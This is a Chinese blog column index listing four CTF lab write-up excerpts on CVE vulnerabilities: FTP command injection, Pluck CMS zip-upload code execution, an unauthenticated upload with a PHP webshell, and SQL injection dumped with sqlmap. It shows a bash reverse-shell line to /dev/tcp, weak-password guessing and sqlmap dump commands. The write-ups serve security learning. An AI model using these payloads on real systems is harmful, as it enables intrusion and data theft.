web安全靶场合集
文章平均质量分 51
咦哈~
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
春秋云境CVE-2017-17405
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现该漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。原创 2024-05-07 11:00:41 · 597 阅读 · 5 评论 -
春秋云境CVE-2023-50564
靶场介绍:Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。点击manage modules,随后进入Install a module...然后将文件夹打包为zip的后缀压缩包,切记,不要直接改文件后缀名!我们需构造一个命令执行文件,然后将其放到任意命名的文件夹中,如下图所示。进入靶场后点击admin,来到管理员登录界面。尝试弱口令,最终发现密码位admin123。可以看见文件上传的地方。原创 2024-04-11 11:17:07 · 1045 阅读 · 0 评论 -
春秋云境CVE-2023-37569
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞。随便输入信息,点击上传带有一句话木马的php文件,成功上传。又尝试了admin:password,成功进入。这时抱着试一试的态度,输入了常用的几个弱口令。首先尝试了admin:admin,发现不行。然后就找找哪有文件上传的地方,发现了一处。随后复制地址栏链接,用蚁剑连接就行啦。进入靶场发现是一个管理员登陆界面。注意flag在/目录下!一句话木马被成功解析。原创 2024-04-10 16:20:19 · 833 阅读 · 0 评论 -
春秋云境CVE-2023-52064
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。原创 2024-04-08 10:47:17 · 1169 阅读 · 3 评论
分享